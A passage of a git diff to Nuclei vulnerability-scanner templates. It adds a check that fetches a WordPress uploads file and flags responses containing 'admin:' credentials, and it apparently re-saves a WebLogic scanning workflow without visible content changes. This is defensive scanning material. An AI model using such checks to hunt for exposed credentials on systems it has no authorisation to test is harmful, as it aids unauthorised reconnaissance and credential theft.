-          - "text/plain"
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/uploads/data.txt"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "admin:"
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200
diff --git a/workflows/weblogic-workflow.yaml b/workflows/weblogic-workflow.yaml
index f4ab437eb2..f8903eb960 100644
--- a/workflows/weblogic-workflow.yaml
+++ b/workflows/weblogic-workflow.yaml
@@ -1,12 +1,12 @@
-id: weblogic-workflow
-
-info:
-  name: WebLogic Security Checks
-  author: dr_set
-  description: A simple workflow that runs all WebLogic related nuclei templates on a given target.
-
-workflows:
-  - template: technologies/weblogic-detect.yaml
-
-    subtemplates:
-      - tags: weblogic
+id: weblogic-workflow
+
+info:
+  name: WebLogic Security Checks
+  author: dr_set
+  description: A simple workflow that runs all WebLogic related nuclei templates on a given target.
+
+workflows:
+  - template: technologies/weblogic-detect.yaml
+
+    subtemplates:
+      - tags: weblogic